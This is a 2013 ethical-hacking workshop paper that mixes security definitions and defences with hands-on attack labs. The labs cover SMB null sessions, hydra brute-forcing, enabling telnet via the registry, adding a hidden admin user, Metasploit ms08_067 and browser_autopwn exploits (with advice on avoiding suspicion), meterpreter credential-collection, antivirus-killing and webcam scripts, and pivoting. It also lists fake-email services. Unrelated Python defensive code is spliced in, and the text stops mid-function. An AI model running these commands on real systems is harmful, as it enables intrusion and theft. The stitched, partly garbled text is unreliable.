Hacking & Pen Testing V10


Ethical Hacking & Penetration Testing (Overview)

By

Engr. Effiong Ndarake Effiong


CEng, MBCS, CITP, CEH, CHFI, MCSE, CCNA, MCTS, NCLA, DCTS, MIAM, ACE, B.Sc., M.Sc., Security+

Chartered Engineer, Chartered IT Professional; Captain / CIO, Efficacy Technologies Limited


Disclaimer:

The information, exercises and tools contained in this paper may not be used by you or any other
party for any purpose that violates any local, state, federal or international law. You understand
that breaking into any network or computer system not owned by you or authorized by the owner
may be illegal.

About Me:

I am a
CEng: Chartered Engineer
CITP: Chartered IT Professional
MIAM: Member International Academy of Management.
MBCS: Member British Computer Society
Member Association of Computing Machineries (ACM)
Member Information System Audit and Control Association (ISACA)
Certified Expert Witness and Prosecutor (National Institute of Justice, USA)
Certified Crime Scene Investigator (President DNA Initiative, USA)
Certified Digital Forensics Investigator (Texas A&M University, USA)
ACE: Access Data Certified Examiner
Security+: CompTIA security+ certified
MCP: Microsoft Certified Professional
MCTS: Microsoft Certified Technical Specialist
CEH: Certified Ethical Hacker.
CHFI: Computer Hacking Forensics Investigator
NCLA: Novell Certified Linux Administrator
DCTS: Data Center Technical Specialist.
CCNA: Cisco Certified Network Administrator
ITIL: Information Technology Infrastructure Library (Certified IT Service Manager)
CCSA: Cambridge University Certified Security Administrator
PGD: Post Graduate Diploma in Cyber Crime and Forensic Science
BSc: Bachelors of Science in Information Technology.
MSc: Masters of Science in Information Security
MBA: Masters of Business Administration in Technology Management (Ongoing)
IT Manager, MicroCred Microfinance Bank
Pioneer IT Manager, Peace Microfinance Bank
Penetration Tester, Ethical Hacker, Digital Forensics Examiner & Crime Scene Investigator.
IT Security Consultant, Cyber Crime Expert, Trainer and Information Security Researcher
Captain and CIO Efficacy Technologies Limited

Efficacy Technologies Limited @ July 2013 Page 2


Introduction:

"If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know
yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the
enemy nor yourself, you will succumb in every battle." (Sun Tzu, ‘The Art of War’)

The overdependence of individuals, governments and businesses on technology has given birth to the
rising wave of cybercrime. This has made security a necessity, not a luxury. If you are
unaware of that, no doubt, you are still living in the past. This workshop aims to show you the
importance of information security, and to expose you to the techniques and tools hackers use in
assaulting security. I will equip you with the techniques you need to defend yourself
and your network. This workshop alone won’t make you a hacker or an expert; it usually takes
years of study and experience to be a great hacker. To be a hacker you need motivation, initiative
and the ability to educate yourself. Let’s get started.

Objective:
At the end of this workshop, you will have learned how easy it is for the bad guys to break into networks,
and you will also understand how to defend yourself and your organization.

Definitions:

What is Penetration Testing?

A penetration test is the process of actively evaluating a company’s information security measures.

What is Vulnerability Assessment?

A vulnerability assessment is the identification of weaknesses or vulnerabilities in a system.

Ethical Hacking: the art and science of determining the vulnerability of your information
infrastructure in order to better defend it.

Uses of Ethical hacking:

- It is used to determine the weaknesses in your network before the real hackers do.
- It uses the same techniques and tools as the bad guys.
- It helps in finding the weaknesses and proffers solutions to mitigate them.

Threat
- An agent that can cause harm.

Vulnerability
- A flaw in our environment that a bad guy can use to harm us.

Exploit
- A way of breaching the security of an IT system through its vulnerability.



Risk
- The existence of a vulnerability in our system.

Risk Categorization
- High Likelihood + High Impact = Critical
- Low Likelihood + High Impact = Urgent
- High Likelihood + Low Impact = Important
- Low Likelihood + Low Impact = Informational

Risk (R) = Asset value (A) x Threat (T) x Vulnerability (V), i.e. R = A x T x V

Target
- A system or its component that is identified and subjected to a required security evaluation.

Attack
- Any action that violates the security of a system; it can be seen as an assault on the system’s
security.

Hacker
- An intelligent individual with excellent computer skills and the ability to create and
explore computer software and hardware.

Hacking
- The practice of modifying the features of a system in order to accomplish a
goal outside of the creator’s original purpose.

Cracker
- A person who uses hacking skills for malicious intent, such as stealing business data,
credit card information or passwords, and destroying computing resources.

Ethical hacking and white hat hacking are often used interchangeably.

Types of Ethical hacking:

- White Box testing: full knowledge of the infrastructure
- Gray Box testing: partial knowledge of the system
- Black Box testing: no knowledge whatsoever of the infrastructure

Your Responsibilities as an Ethical hacker!

- Use knowledge and tools for legal purposes only.
- Hack with the intention of identifying security issues and providing a remedy.
- Get signed management approval or authorization from the network owner.
- Create a test plan with the exact parameters and goals of the test, and get management
approval of your actions.
- Bear in mind that you are to defend the network and not to destroy it.
- Keep results and information strictly confidential.
- Make full disclosure of problems and fixes.

- Remember that unauthorized access to any system not owned by you is against the law.

Skills of a hacker:
- Working knowledge of TCP/IP
- Networking and hardware knowledge
- Understanding of the Windows and Linux command lines
- Understanding of Windows and Linux OS, Mac OS X, Solaris, etc.
- Understanding of firewalls, routers, IDSs, IPSs, etc.
- Understanding of common security vulnerabilities and how to correct them
- Understanding of how various hacking tools and techniques work
- Programming knowledge is a plus
- Understanding hacker-friendly languages such as, but not limited to, Python, Ruby, C, C++ and
HTML will make your work easier
- Understanding a scripting language like bash is a good deal
- Know everything about everything

Penetration testing and ethical hacking require a great deal; you have to understand what the
tools do, to avoid destroying the system or the organization you are trying to protect.

Types of attack
- Full Penetration
- Denial of service
- Specific Information
- Social Engineering

Classes of Hacking:
- White hat hacking (the good guys)
- Gray hat hacking (sometimes good and sometimes bad)
- Black hat hacking (the bad guys)

Formal Methodology
- OSSTMM (Open Source Security Testing Methodology Manual)
- NIST SP 800-42
- OCTAVE (Operationally Critical Threat, Asset, and Vulnerability Evaluation)
- TRAWG (Threat and Risk Assessment Working Guide)

Ethical hackers
- Employed by companies to perform penetration tests

Penetration test
- A legal attempt to break into a company’s network to find its weakest link
- The tester only reports findings and does not solve problems

Types of Penetration testing

- White Box Testing (full knowledge of the infrastructure)
- Grey Box Testing (partial knowledge of the infrastructure)
- Black Box Testing (no knowledge at all)

Security test
- More than an attempt to break in; it also includes analyzing the company’s security policy and
procedures
- The tester offers solutions to secure or protect the network

Security
- A state of well-being of information and infrastructure in which the possibility of
successful and yet undetectable theft, tampering or disruption of information and
services is kept low or tolerable.

Elements of Security.

The elements of security, also known as the CIA triad, are as follows:

- Confidentiality
- Integrity
- Availability

Security, functionality and ease of use triangle:

Hacking your organization will not only affect data but also the integrity of your
organization.

Accessing a computer without permission is illegal.

What it takes to be a security tester

- Knowledge of network and computer technology
- Ability to communicate with management and IT personnel
- Understanding of the laws
- Ability to use the necessary tools
- Programming knowledge is a plus

Phases of Hacking

- Reconnaissance
  - Passive / Active
- Scanning
- Gaining Access
  - Operating system level
  - Application level
  - Network level
  - Denial of Service (DoS)
- Maintaining Access
- Clearing tracks

Hacktivism
- Hacking for a cause

What hackers do!

Reconnaissance
- The first step in hacking and penetration testing
- The gathering of as much information as possible about the target company, its
network, infrastructure, personnel and others
- Recon, for short, can be either passive or active

Scanning:
- Scanning the network to determine which hosts are alive on the network
- Thousands of tools are available for scanning networks
- Easily detected by an Intrusion Detection System

Fingerprinting / service enumeration:

- Used to determine what services are running on the system, in order to determine what vulnerabilities
might be available
- Lots of tools are available; scanning tools sometimes include fingerprinting capabilities

Vulnerability Assessment / Research

- Determines what vulnerabilities exist in an application or service
- Uses known vulnerability databases
- Targets the most popular operating systems and applications
- Lots of tools are available, such as but not limited to
  - Nessus, Retina, NeXpose
- Use vulnerability research sites as well, such as but not limited to
  - www.windowsfocus.com
  - www.security.com
  - www.microsoft.com/security

Vulnerability Exploitation.
- Using known exploits, or developing new ones, to exploit a discovered vulnerability and gain
access to the system.



Penetration and access
- Penetrating the system
- Systems are actually penetrated based upon the exploited vulnerabilities

Privilege escalation / owning the box

- Owning the box means gaining full control of the system
- Gaining administrative access privilege on the target system
- It may start as a guest account or a normal user; an exploit can then be used to elevate privilege to
root or administrator rights, as the case may be

Evading IDS and Clearing tracks.

- Hackers can and will defeat IDS and firewalls to avoid detection, using numerous tools and
techniques, such as but not limited to
  - Fragmenting packets using “fragroute”
  - Using port redirectors and encoders that will change the look of the traffic
- Clearing tracks: deleting log files, hiding the hacker’s tools on the system, resetting
permissions

Maintaining Access:
- The hacker will want to maintain access for as long as they like
- Maintaining access to the system can be done using rootkits, trojans and other backdoors
- The system can be used as a zombie to attack other systems and widen the access to the
network

Approaches to Ethical hacking.

- Remote network
- Remote dial-up network
- Local network
- Stolen equipment
- Social engineering
- Physical entry

Reconnaissance.
Passive Recon.
- Gathering information with whois and other sites without touching the target system.
  - Sources of information include: company website, job sites, company literature,
bulletins, partner sites, forums, blogs, groups, the Securities and Exchange Commission, the
Better Business Bureau.
Active Recon
- Using various tools and techniques to gather information from the target system.

Output of Recon

- Names of company officers, branch network and addresses, business partners and
connections, IP address space, staff email addresses, support phone numbers, domain
names, types of systems and applications

Recon Demo:
- Using WHOIS!
- www.whois.net
- www.johnny.ihackstuff.com
- Sam Spade
- Mail bouncing
- Banner grabbing
- DNS zone transfer
- theHarvester
- emailTrackerpro
- Wayback Machine (www.archive.org)

Others may include

- People search
  - www.intellius.com
  - www.people.yahoo.com
  - www.jobsdb.com
- Advanced googling
- Competitive intelligence gathering
  - www.clseek.com
  - www.intellogist.com/anacubis
- Extract DNS info
  - www.dnsstuff.com
  - www.arin.net
  - www.allwhois.com
- Finding the IP range
- Discovering subnets
  - Traceroute
  - NeoTrace
  - Visual Trace
  - Website Watcher
  - www.readnotify.com
  - www.afrinic.net
- Social engineering
- Shoulder surfing
- Dumpster diving
- Piggybacking / site visit

telnet www.targetcompany.com
ftp www.targetcompany.com
See the information supplied if successfully connected.



#netstat -n
#netstat -a
#netstat -ano
To see the connections.

Security Sites:
- www.securiteam.com
- www.cybercrime.gov
- www.exploit-db.com
- www.zone-h.org
- www.securityfocus.com
- www.packetstormsecurity.com

Footprinting, or profiling the organization: hacking is 90% profiling and 10% attacking.

Footprinting output may include these and more:

- Unearthing initial information
- Locating the network range
- Ascertaining active machines
- Discovering open ports / access points
- Detecting operating systems
- Uncovering services on ports
- Mapping the network

Other common deliverables include

- Domain name lookup
- Locations
- Contacts (telephone, email addresses, etc.)

Steps in performing footprinting

- Find the company external and internal
- Perform whois lookups for personal details
- Extract DNS information
- Mirror the entire website and look up names
- Extract archives of the website
- Google for the company’s news and press releases
- Use people search for personal information of employees
- Find the physical location of the web server using NeoTrace tools
- Analyze the company’s infrastructure details from job postings
- Track emails using readnotify.com

Footprinting Countermeasures:

- Don’t give accurate information in whois
- Go through a proxy for domain name registration
- Configure your systems not to respond to ICMP requests

- All servers should be configured to require authentication before an nslookup can be
carried out.

Competitive intelligence gathering.
- Numerous resources exist to find information legally
- Competitive intelligence: gathering information using technology
- Identify the methods others can use to find information about your organization
- Limit the amount of information the company makes public
- Prevalent technology
- Educate users about spyware

Enumeration extracts information about:

- Resources or shares on the network
- User names or groups assigned on the network
- The last time a user logged on
- Users’ passwords

Before enumeration, you use port scanning and footprinting
- To determine the OS being used
- Enumeration is an intrusive process

Scanning:
Scanning refers to a set of procedures for identifying hosts, services and ports in a network.
A hacker will use this to create a blueprint of the organization and its vulnerabilities.

Types of Scanning.
- Port scanning
- Network scanning
- Vulnerability scanning

Objectives of Scanning
- Detect live systems on the network
- Discover open ports
- Discover the operating system (OS)
- Discover services
- Discover vulnerabilities

Scanning Tools.
- Angry IP Scanner
- hping3
- Friendly Pinger
- Nmap
- Nessus
- NetCat
- NeXpose
- Retina
- GFI LANguard
- Nikto
- SATAN
- SAINT
- Cheops
- SuperScan
- Look@LAN, etc.

Scanning Demo:
- Use of nmap, SuperScan, GFI LANguard, Angry IP Scanner, etc.

Preventions:
- Use a good firewall (stateful packet inspection)
- Use an Intrusion Detection System (IDS) and IPS
- Only needed ports should be opened
- Sensitive information should not be disclosed
- Encrypt sensitive information sent over the internet
- Use ssh instead of telnet and https instead of http

System Hacking

Email crime:
Some free anonymous email websites are:
- www.emkei.cz
- www.sendanonymousemail.net
- www.anonymailer.net
- www.mail.anonymizer.name (sends attachments as well)
- www.fakemailer.net
- www.fakemailer.info
- www.deadfake.com/send.aspx

Consequences of fake email:

- An email from your email ID to any security agency declaring a bomb blast, war or
revolution can make you spend the rest of your life in jail.
- An email from you to your wife or husband can cause a break-up and damage your
relationship.
- An email from your email ID to your boss carrying your resignation letter or any
disciplinary case can cost you your job or make you face disciplinary action.
- A fake email from a reputable organization claiming you’ve been offered employment can
cost you resources and time.
- There are lots of damaging effects of fake emails.

Email Password hacking.

- There is no specific sound and proven attack available just to hack the password of
email accounts.
- Also, it is not so easy to compromise email servers like Yahoo, Gmail, etc.
- Email password hacking can be accomplished via some client-side attacks: we
try to compromise the user and get the password of the email account before it reaches
the desired email server.
- One easy way to hack an email password is the very famous ‘phishing attack’.
- Others are key loggers, shoulder surfing, social engineering, etc.

Phishing attack

- The act of sending an email to a user, falsely claiming to be an established legitimate
enterprise, in an attempt to scam the user into surrendering private information that will be
used for identity theft.
- The email directs the user to visit a web site where they are asked to update personal
information, such as passwords, credit card numbers, valid ID numbers and bank account
numbers, which the legitimate organization already has. The web site, however, is bogus
and set up only to steal the user’s information.

Phishing scams could also be:

- Emails inviting you to join a social group, asking you to log in using your username and
password
- An email saying that your bank account is locked and asking you to sign in to your account to unlock
it
- Emails containing some information of interest to you and asking you to log in to your
account
- Any email carrying a link to click and asking you to log in
- A Facebook chat asking for your password to help regain a friend’s lost
password

Counter Measures
- Understand that there is absolutely nothing you can do about it.
- Always use secure email like PGP where possible.
- You must use a digital signature to sign all emails.
- Read all emails carefully and check the mail header to verify that the sender is genuine.
- Watch the link carefully before clicking.
- Always check the URL in the browser before signing in to your account.
- Always log in to your accounts after opening the trusted websites yourself, not by
clicking a link in any other website or email.
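Two of the countermeasures above ("check the mail header" and "watch the link carefully") turned into code, as an added example that is not from the workshop paper. `check_link` extracts the host a link really goes to and compares it with the domain the message claims, catching the usual tricks (a fake domain prefixed to a look-alike, a `user@host` URL, a bare IP, a punycode host); `header_domains` compares the visible From: domain with the envelope Return-Path: domain. All domain names, the sample message and the two-label "registrable domain" simplification are constructed assumptions.

```python
"""Phishing-link and forged-sender checks (added example, constructed data)."""
import ipaddress
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse


def registrable_domain(host):
    """Last two labels of a hostname: login.examplebank.com -> examplebank.com.
    Assumption: no multi-part public suffixes such as co.uk are in play."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def check_link(url, claimed_domain):
    """Return (ok, reason). ok is True only when the link's real host is under
    claimed_domain, carries none of the known tricks, and uses https."""
    parsed = urlparse(url)
    host = parsed.hostname
    if not host:
        return False, "no host in URL"
    if parsed.username is not None:
        # https://bank.example@evil.example/ : the real host is after the '@'
        return False, "userinfo before '@' hides the real host " + host
    try:
        ipaddress.ip_address(host)
        return False, "link points at a bare IP address"
    except ValueError:
        pass  # a normal hostname, carry on
    if any(label.startswith("xn--") for label in host.split(".")):
        return False, "punycode (IDN) host, possible look-alike domain"
    if registrable_domain(host) != registrable_domain(claimed_domain):
        return False, "real host %s is not under %s" % (host, claimed_domain)
    if parsed.scheme != "https":
        return False, "not https"
    return True, "host matches claimed domain"


# Constructed message: the visible From: claims the bank, but the envelope
# sender (Return-Path:) belongs to an unrelated domain.
SAMPLE_MAIL = """\
Return-Path: <bounce@bulk-sender.example>
From: "ExampleBank Security" <security@examplebank.com>
Subject: Your account is locked

Sign in to unlock your account: https://examplebank.com.evil-login.net/verify
"""


def header_domains(raw_message):
    """(From: domain, Return-Path: domain). A mismatch is a common sign of a
    forged sender. Assumption: both headers are present in the message."""
    msg = message_from_string(raw_message)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    return_domain = parseaddr(msg.get("Return-Path", ""))[1].rpartition("@")[2].lower()
    return from_domain, return_domain


def sender_mismatch(raw_message):
    from_domain, return_domain = header_domains(raw_message)
    return from_domain != return_domain


if __name__ == "__main__":
    for link in ("https://login.examplebank.com/account",
                 "https://examplebank.com.evil-login.net/verify",
                 "https://www.examplebank.com@evil.example/login",
                 "http://192.0.2.10/login"):
        print(link, "->", check_link(link, "examplebank.com"))
    print("From/Return-Path domains:", header_domains(SAMPLE_MAIL),
          "mismatch:", sender_mismatch(SAMPLE_MAIL))
```

A Return-Path mismatch on its own is only a signal (mailing-list software legitimately rewrites it), which is why the text pairs it with reading the message carefully; the link check, by contrast, is a hard rule: if the host is not under the domain you expect, do not sign in there.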

Securing your Email Account

- Always configure a secondary email address for recovery purposes
- Properly configure the security question and answer in the email account
- Do not open emails from strangers
- Do not use anyone else’s computer to check your email
- Take care with phishing links
- Do not sign in to any site with your real email address and password
- Do not reveal your passwords to your friends or mates

Malicious software
- A piece of software that carries out undesirable effects in a system.
- Network attacks prevent a business from operating.
- Malicious software (malware) includes
  - Viruses
  - Worms
  - Trojan horses

Goals of malicious software
- Destroy data
- Corrupt data
- Shut down a network or system

Cyberattacks against ATM machines

- Slammer and Nachi worms
- Trend produces antivirus for ATM machines
- Nachi was written to clean up the damage caused by the Blaster worm, but it got out
of control
- Diebold was criticized for using Windows for ATM machines, which they also
use on voting machines

Spyware sends information from the infected computer to the attacker:

- Confidential financial data
- Passwords
- PINs
- Any other stored data
- Can register each keystroke entered (key logger)

Trojan.
- A Trojan is a malicious program disguised as some very important application.
- A Trojan appears to perform a desirable and necessary function but, because of hidden
and unauthorized code, performs functions unknown and unwanted by the user.

Common Examples of Trojans.

- Beast
- Back Orifice
- NetBus
- LetMeRule
- ProRat
- GirlFriend
- Sub7

Components of Trojans
A Trojan consists of two parts:

1. A client component
2. A server component

The one which resides on the victim’s computer is called the server part of the Trojan, and the one
which is on the attacker’s computer is the client part of the Trojan.
For the Trojan to function as a backdoor, the server component has to be installed on the
victim’s machine.

Wrapper

- A wrapper is a program used to combine two or more executables into a single packaged
program.
- The wrapper attaches a harmless executable, like a game, to a Trojan’s payload (the
executable code that does the real damage), so that it appears to be a harmless file.
- Hackers use wrappers to bind the server part of the software behind an image or any
other file.
- Wrappers are also known as binders.

Keyloggers
Used to capture keystrokes on a computer
- Hardware
- Software

Software
- Behaves like Trojan programs

Hardware
- Easy to install
- Goes between the keyboard and the CPU
- KeyKatcher and KeyGhost

Protection from key loggers

- Software-based
  - Antivirus
- Hardware-based
  - Random visual tests
  - Look for added hardware

Lock up your servers

- Physical access means they can hack in
- Consider Ophcrack: booting to a CD-based OS will bypass almost any security

Physical security
- Protecting a network also requires physical security
- Inside attacks are more likely than attacks from outside the company

How are computers infected?

- A deceptive dialog box that may tell you your computer may be infected: "run a
scan now to clean it".

Session hijacking
- Enables an attacker to join a TCP session
- The attacker makes both parties think he or she is the other party

Anonymous connection established without credentials

- Used to display information about users, groups, shares and password policies
- Necessary only if networks need to support older Windows versions

To enumerate NetBIOS vulnerabilities use:

- Nbtstat, Net view, Netstat, Ping, Pathping and Telnet commands

NetBIOS hacking steps:

Our target system is 192.168.168.131.
In the Windows command prompt type:

#net use \\192.168.168.131\ipc$ "" /u:""   (connect to the hidden inter-process communication share)

#net use   (verify the connection)

#net view \\192.168.168.131   (view the network shares on the target system)
#net use * \\192.168.168.131\share   (map the share on the target machine to your machine)
#net use \\192.168.168.131\IPC$ /delete
#net use \\192.168.168.131\IPC$ "" /u:Administrator
This will connect to the administrator account; if it fails, it means the administrator
account password is not blank. Then try to brute force the administrator’s password.
#nbtstat -A 192.168.168.131   (capture the name table over NBT)

Use Hydra, John the Ripper, Cain & Abel, Ophcrack, Brutus or any other password cracker to
crack the password.
Example using hydra:
#hydra.exe -l Administrator -P passlist.txt 192.168.168.131 smb

This will crack the administrator’s password using the password list given in passlist.txt; if the
password is in the list, it will definitely crack it.

You can use the “ShareEnum” utility, freely available on the internet, to enumerate all shared folders
and services on the target machine.

#compmgmt.msc /s   (open Computer Management)

From the Action menu click "Connect to another computer", enter the IP address (in this case
192.168.168.131) and connect to it.
You can browse services, device management and other system information from the target.

#regedit   (opens the Registry Editor)

Browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Telnet Server 1.0 and open the NTLM value.
Set the value data to 1; this will enable telnet.
#telnet 192.168.168.131
#net user hacker hacking /add   (creates a user called hacker with the password
hacking on the remote machine)
#net localgroup administrators hacker /add   (adds the user hacker to the local
Administrators group)

Password cracking can be passive online using MITM, or an offline attack using dictionary,
hybrid or brute-force methods.

Password cracking can also be non-technical, such as

- Shoulder surfing
- Keyboard sniffing (keyloggers)
- Social engineering

Counter Measures:
- Smartcard
- Biometrics
- Strong and complex passwords
- A combination of any two or all three of the above

A comprehensive password policy is critical

Change passwords regularly.
The policy should include:
- Require at least eight characters
- Require complex passwords
- Passwords can’t be common words, dictionary words, slang, jargon or dialect
- Passwords must not be identifiable with a user
- Never write it down or store it online or in a file
- Do not reveal it to anyone
- Use caution when logging on and limit reuse

Configure domain controllers

- Enforce password age, length and complexity
- Password policy aspects that can be enforced:
  - Account lockout threshold: set the number of failed attempts before the account is disabled temporarily
  - Account lockout duration: set the period of time the account is locked out after failed logon attempts
- Disable LM hashes
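The policy rules and the two lockout settings above, as an added example that is not from the workshop paper: `password_violations` reports which of the listed rules a candidate password breaks (length, complexity, common word, tied to the user name), and `LockoutPolicy` models the domain-controller behaviour of a lockout threshold within an observation window and a lockout duration. The small word list, the thresholds and the `now` timestamps are constructed assumptions; a real deployment would use a full dictionary and the directory's own counters.

```python
"""Password-policy validator and account-lockout model (added example)."""
import re
import time

MIN_LENGTH = 8
# Constructed stand-in for a real dictionary / common-password list.
COMMON_WORDS = {"password", "welcome", "letmein", "qwerty", "admin", "summer"}
CHARACTER_CLASSES = (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]")


def password_violations(password, username=""):
    """Return the names of the policy rules `password` breaks (empty list = OK)."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append("too_short")
    # "Complex" here means at least three of: lower, upper, digit, symbol.
    classes = sum(bool(re.search(pattern, password)) for pattern in CHARACTER_CLASSES)
    if classes < 3:
        problems.append("not_complex")
    lowered = password.lower()
    if any(word in lowered for word in COMMON_WORDS):
        problems.append("common_word")
    if username and username.lower() in lowered:
        problems.append("contains_username")
    return problems


class LockoutPolicy:
    """`threshold` failed logons within `window` seconds lock the account for
    `duration` seconds; a successful logon clears the failure counter.
    Timestamps are passed explicitly so the behaviour is testable."""

    def __init__(self, threshold=5, window=900, duration=900):
        self.threshold, self.window, self.duration = threshold, window, duration
        self._failures = {}      # user -> [failure timestamps within window]
        self._locked_until = {}  # user -> epoch seconds when the lock expires

    def is_locked(self, user, now=None):
        now = time.time() if now is None else now
        return self._locked_until.get(user, 0) > now

    def record_attempt(self, user, success, now=None):
        """Register a logon attempt; returns 'locked', 'ok' or 'failed'."""
        now = time.time() if now is None else now
        if self.is_locked(user, now):
            return "locked"   # even a correct password is refused while locked
        if success:
            self._failures.pop(user, None)
            return "ok"
        recent = [t for t in self._failures.get(user, []) if now - t <= self.window]
        recent.append(now)
        self._failures[user] = recent
        if len(recent) >= self.threshold:
            self._locked_until[user] = now + self.duration
            self._failures.pop(user, None)
            return "locked"
        return "failed"


if __name__ == "__main__":
    for candidate in ("Password123!", "Tr0ub4dor&3", "alice2024"):
        print(candidate, "->", password_violations(candidate, username="alice") or "accepted")
    policy = LockoutPolicy(threshold=3, window=60, duration=300)
    for t in (1000, 1001, 1002, 1100):
        print("attempt at", t, "->", policy.record_attempt("bob", False, now=t))
```

The lockout window is what makes the threshold meaningful: without it, three typos spread over a month would lock an account; with it, the count only climbs for failures that cluster the way a guessing attack does. The list also says to disable LM hashes, which is a separate Group Policy setting rather than something this code models.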

LAB LAB LAB

Tools to be used include, but are not limited to:
- Core Impact (commercial)
- Immunity Canvas (commercial)
- Metasploit Framework (open source, that is FREE)
In this lab I will use the Metasploit Framework that comes with BackTrack 5 R3.

We are going to do the following.

- Scan for open ports on the victim machine
- Find open ports and services
- Find matching exploits
- Try exploits on the victim to see if we can break in
- If we succeed, use a remote bind_tcp meterpreter payload

- If the victim is behind NAT, that is, we cannot reach the victim directly with an IP
connection:
- The victim needs to reach out to us (the attacker) first
- We will use a client-side attack
- Use a browser-based exploit
- Use social engineering

- Email an infected PDF with a meterpreter payload, bind a Trojan and email the victim, etc.
- Use the Social-Engineer Toolkit (SET)

Browser Exploit.
- Create a malicious site which exploits browser vulnerabilities
- Lure the victim to the site
- The victim’s browser will be exploited
- Use a reverse_tcp meterpreter payload
- The victim will initiate a connection
If the operating system is fully patched, target other applications on the server.

Exercise 1:
In the Metasploit console (msf):
Exploit: windows/smb/ms08_067_netapi
Payload: windows/shell/bind_tcp
Do some damage: run commands like ipconfig, route print, hostname, dir, mkdir, cd,
pathping, tasklist, etc.
Migrate to the desktop and create a directory and a file in the directory.

Exercise 2:
Use the same exploit as above but with a different payload.
Payload: windows/meterpreter/bind_tcp
You can background the open meterpreter session and get back to it with sessions -l and sessions -i
"session number"; run all sorts of meterpreter commands that you can think of.

Exercise 3: Using a client-side attack to attack victims behind a firewall or NAT
#use auxiliary/server/browser_autopwn
#set LHOST, SRVPORT, URIPATH
#run
It is advisable to set SRVPORT to port 80 to avoid suspicion, as this is the well-known http port.

On the client machine open up Internet Explorer and connect to the attacker machine.
Watch what happens: a meterpreter session will be opened and migrated from the attacker machine.

Run meterpreter commands such as

#sessions -l
#sessions -i "session number"
#getuid
#getdesktop

To take a screenshot, the “espia” extension must be loaded, which is not loaded by default.
#use espia
#?
#screengrab
#screenshot

We can also record audio and use the webcam of the remote system. We can sniff on the
remote victim’s network and also run meterpreter scripts.

Meterpreter Scripts:
To run a meterpreter script, type run and hit “tab” twice to get a list of all available scripts.

meterpreter > run
Let’s run a few selected scripts and have fun; scripts like

#run webcam
#run gettelnet
#run file_collector
#run get_loggedon_users
#run vnc
#run duplicate
#run autoroute
#run get_env
#run get_local_subnets
#run killav
#run credcollect
#run get_application_list

Exercise 4: Pivoting:
- No direct access to the target system
- We broke into a system with a direct connection that also has a connection to the target system
- We have a meterpreter session from the directly connected system

meterpreter >
#run arp_scanner -h
#run arp_scanner -r 10.10.10.1/24
#background
#route -h
#route add 10.10.10.1 255.255.255.0 1   (1 here = the meterpreter session opened)
#route print
#sessions -l
#back
msf > use auxiliary/scanner/portscan/tcp
#show options
#set RHOSTS and PORTS, then #run and #back
Use any exploit that the system is vulnerable to in order to exploit the internal system.

Exercise 5: Port forwarding

- The attacker has direct access to computer1 and no direct access to computer2
- A local listening port is created on the attacker’s machine
- All traffic to this listening port is sent to the destination port on computer2
- Computer1 acts as a relay
- Computer1 has been broken into already
meterpreter >
#portfwd -h
#portfwd add -l 1500 -p 6262 -r 10.10.10.12
#background
msf exploit(ms03_026_dcom) > route print

Launch a web browser from the attacker machine and point it to port 6262 as was assigned,

e.g. http://localhost:6262

Tools for identifying vulnerabilities in Windows.

Microsoft Baseline Security Analyzer (MBSA)
Capable of checking for:
- Patches
- Security updates
- Configuration errors
- Blank or weak passwords

Hardening your systems

- Conduct penetration testing frequently
  - Finds and reports vulnerabilities
  - Conduct security tests often
  - Finds vulnerabilities
  - Gives recommendations for correcting the vulnerabilities
- Best way to keep systems secure
  - Keep up to date
    - Attackers take advantage of known vulnerabilities
  - Options for small networks
    - Accessing Windows Update manually
    - Configure Automatic Updates
  - Options for large networks
    - Systems Management Server (SMS)
    - Windows Software Update Services (WSUS)
    - Third-party patch management solutions
  - An antivirus solution is essential
    - Small networks: a desktop antivirus tool with automatic updates
    - Large networks: require a corporate-level solution
  - Antivirus tools
    - Almost useless if not updated regularly

Important steps for monitoring critical areas

- Performance
- Traffic patterns
- Possible security breaches
- Monitoring can have a negative impact on performance
- Review regularly
- Signs of intrusion or problems
- Use a log-monitoring tool
- Disable unneeded services
- Delete unnecessary applications or scripts
- Unused applications are invitations for attacks

- Reducing the attack surface
- Open only what needs to be open, and close everything else
- Filter out unnecessary ports
- Make sure perimeter routers filter out ports 137 to 139 and 445
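The last point above (perimeter filtering of the NetBIOS and SMB ports, which is also what defeats the `net use` and `nbtstat` enumeration shown earlier from the internet side) is worth checking mechanically rather than by eye, because ordering mistakes in a rule set are easy to miss. As an added example that is not from the workshop paper, the Python below parses a small first-match rule list, simulates the decision for probe packets to 137-139 and 445, and reports any that would still get through; it is shown against a weak rule set and the corrected one. The rule syntax, the addresses and both rule sets are constructed assumptions.

```python
"""Perimeter rule audit for NetBIOS/SMB ports (added example, constructed data).

Rule format (assumption): ordered, first match wins, one rule per line:
    <action> <proto> <source> <dst_ports>
where action is allow|deny, proto is tcp|udp|any, source is 'any' or a CIDR,
and dst_ports is a single port, a range lo-hi, or 'any'."""
import ipaddress

NETBIOS_SMB_PORTS = (137, 138, 139, 445)

# Weak: the partner allow rule is ordered BEFORE the NetBIOS/SMB denies, so
# one internet range still reaches port 445.
WEAK_RULES = """\
allow tcp 203.0.113.0/24 445
deny  tcp any 137-139
deny  udp any 137-139
deny  tcp any 445
allow tcp any 443
deny  any any any
"""

# Corrected: the denies come first, so no external source reaches those ports.
FIXED_RULES = """\
deny  tcp any 137-139
deny  udp any 137-139
deny  tcp any 445
allow tcp 203.0.113.0/24 445
allow tcp any 443
deny  any any any
"""


def parse_rules(text):
    """Turn the rule text into a list of (action, proto, network|None, lo, hi)."""
    rules = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        action, proto, src, ports = line.split()
        if ports == "any":
            lo, hi = 0, 65535
        elif "-" in ports:
            lo, hi = (int(p) for p in ports.split("-", 1))
        else:
            lo = hi = int(ports)
        net = None if src == "any" else ipaddress.ip_network(src)
        rules.append((action, proto, net, lo, hi))
    return rules


def decide(rules, proto, src_ip, port):
    """First matching rule wins; default deny when nothing matches."""
    ip = ipaddress.ip_address(src_ip)
    for action, rproto, net, lo, hi in rules:
        if rproto not in ("any", proto):
            continue
        if net is not None and ip not in net:
            continue
        if lo <= port <= hi:
            return action
    return "deny"


def unfiltered_netbios(rules, probe_sources=("198.51.100.7", "203.0.113.9")):
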